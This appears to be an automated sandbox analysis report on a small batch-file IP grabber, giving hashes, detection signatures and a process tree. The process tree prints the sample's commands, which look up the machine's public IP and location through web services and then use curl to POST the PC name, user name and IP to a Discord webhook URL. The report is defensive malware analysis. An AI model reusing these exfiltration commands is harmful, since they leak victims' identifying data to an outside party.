Analysis

  • max time kernel
    84s
  • max time network
    124s
  • platform
    windows11-21h2_x64
  • resource
    win11-20240214-en
  • resource tags

    arch:x64arch:x86image:win11-20240214-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    28/03/2024, 02:59

General

  • Target

    ipgrabb1er.bat

  • Size

    1KB

  • MD5

    24e441ba68d62ccc6eae517dd7232bc3

  • SHA1

    b5331cabd71251761f0b632cc8087f915d21ee5a

  • SHA256

    39e9b37f561abc6eeea56735f329ab12014aa9d5f45fdaf36703549a49696267

  • SHA512

    bb2366ffdec92e78a0537a3f75d0d1f17182f809e687b1fc8d2f8fba250278a4e9cd7b07f61efd68fa8440fd06138cb48841a5a876a031c868373e5b28d9aa3a

Score
6/10

Malware Config

Signatures

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\ipgrabb1er.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2464
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /c curl -s "https://api64.ipify.org?format=json" | findstr /r /c:"\"ip\":"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:3136
      • C:\Windows\system32\curl.exe
        curl -s "https://api64.ipify.org?format=json"
        3⤵
          PID:604
        • C:\Windows\system32\findstr.exe
          findstr /r /c:"\"ip\":"
          3⤵
            PID:4924
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c curl -s "https://ipinfo.io/{"ip":"89.149.23.59"}/json" | findstr /i "city region country"
          2⤵
          • Suspicious use of WriteProcessMemory
          PID:4572
          • C:\Windows\system32\curl.exe
            curl -s "https://ipinfo.io/{"ip":"89.149.23.59"}/json"
            3⤵
              PID:3820
            • C:\Windows\system32\findstr.exe
              findstr /i "city region country"
              3⤵
                PID:1184
            • C:\Windows\system32\curl.exe
              curl -X POST -H "Content-Type: application/json" -d "{ \"content\": \"PC Name: VWSKOMFM\\User Account Name: Admin\\IP Address: {"ip":"89.149.23.59"}\\Location: \" }" https://discord.com/api/webhooks/1222730303299129455/C-jlNtX8rSs6pyYUKNodg2N2Jhdmf4Yw1PhKn4b6292btwdZrdU8l6wWN1dbklKjw-07
              2⤵
                PID:4364

            Network

            MITRE ATT&CK Enterprise v15

            Replay Monitor

            Loading Replay Monitor...

            Downloads